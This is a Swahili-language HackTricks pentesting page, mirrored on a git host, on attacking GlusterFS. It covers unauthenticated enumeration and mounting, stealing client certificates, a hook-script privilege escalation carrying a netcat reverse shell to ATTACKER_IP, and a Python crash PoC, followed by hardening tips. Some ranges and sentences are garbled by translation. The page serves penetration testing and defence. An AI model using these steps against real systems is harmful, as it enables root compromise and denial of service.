maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md

116 lines
4.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 24007-24008-24009-49152 - Pentesting GlusterFS
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**GlusterFS** ni **mfumo wa faili ulio sambazwa** ambao unachanganya uhifadhi kutoka kwa seva nyingi katika **jina moja lililounganishwa**. Daemon ya usimamizi (`glusterd`) inasikiliza kwa default kwenye **24007/TCP** na inaagiza bricks za data-plane ambazo huanza kwenye **49152/TCP** (bandari moja kwa brick, ikiongezeka). Matoleo kabla ya 9.x yalitumia **2400824009/TCP** kwa usafirishaji wa brick, hivyo bado utaona bandari hizo katika makundi ya urithi.
```
PORT STATE SERVICE VERSION
24007/tcp open glusterd GlusterFS (RPC)
49152/tcp open gluster-brick SSL (TLS optional)
```
> Kidokezo: 24007 inajibu simu za RPC hata wakati nodi za kuhifadhi pekee **hazitoi** kiasi chochote; kwa hivyo huduma hii ni lengo la kuaminika ndani ya miundombinu mikubwa.
## Uhesabu
Sakinisha zana za mteja kwenye sanduku lako la shambulio:
```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```
1. **Ugunduzi wa wenzangu & afya**
```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```
2. **Upelelezi wa kiasi**
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```
3. **Kuweka bila ruhusa**
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```
Ikiwa usakinishaji unashindwa, angalia `/var/log/glusterfs/<vol_name>-<uid>.log` upande wa mteja. Masuala ya kawaida ni:
* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)
### Ukarabati wa cheti
Pora faili zifuatazo kutoka kwa nodi yoyote ya mteja iliyoidhinishwa na uweke katika `/etc/ssl/` (au saraka iliyoonyeshwa katika kumbukumbu ya makosa):
```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
---
## Uthibitisho wa Uthibitisho (2022-2025)
| CVE | Matoleo yaliyoathiriwa | Athari | Maelezo |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.010.4, 11.0 | Tumia-baada-ya-kuachia katika `dht_setxattr_mds_cbk` inayoweza kufikiwa kupitia mtandao | **DoS** ya mbali na uwezekano wa RCE. Imerekebishwa katika 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Kusoma nje ya mipaka katika FUSE notify handler | Kuanguka kwa mbali kupitia operesheni za FS zilizoundwa; PoC ya umma inapatikana. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Uthibitisho usio sahihi wa ruhusa wakati wa kupandisha `gluster_shared_storage` | Inaruhusu mteja yeyote asiye na uthibitisho kupandisha kiasi cha admin inasababisha **priv-esc** iliyoelezewa hapa chini. |
> Daima angalia `gluster --version` **katika kila node**; makundi tofauti ni ya kawaida baada ya sasisho za sehemu.
### Kutumia `gluster_shared_storage` (Kuongeza Haki)
Hata katika matoleo ya hivi karibuni, wasimamizi wengi wanaacha kiasi maalum cha `gluster_shared_storage` kuwa na uwezo wa kusomeka na kila mtu kwa sababu inarahisisha geo-replication. Kiasi hiki kina templates za cronjob ambazo zinafanya kazi na **root** katika kila node.
```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh
# 3. Wait until glusterd distributes the hook and executes it as root
```
Ikiwa `hooks/1/` haipo, angalia `/ss_bricks/` njia halisi inaweza kutofautiana na toleo kuu.
### Denial-of-Service PoC (CVE-2023-26253)
```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())
```
Kukimbia kwa script kunasababisha `glusterfsd` < 11.0.
---
## Kuimarisha & Ugunduzi
* **Sasisha** LTS ya sasa ni 11.1 (Julai 2025). CVE zote zilizo juu zimefanyiwa marekebisho.
* Wezesha **TLS** kwa kila brick:
```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Punguza wateja kwa orodha za CIDR:
```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Funua bandari ya usimamizi 24007 tu kwenye **VLAN ya kibinafsi** au kupitia SSH tunnels.
* Angalia kumbukumbu: `tail -f /var/log/glusterfs/glusterd.log` na konfigura kipengele cha **audit-log** (`volume set <vol> features.audit-log on`).
---
## Marejeleo
* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink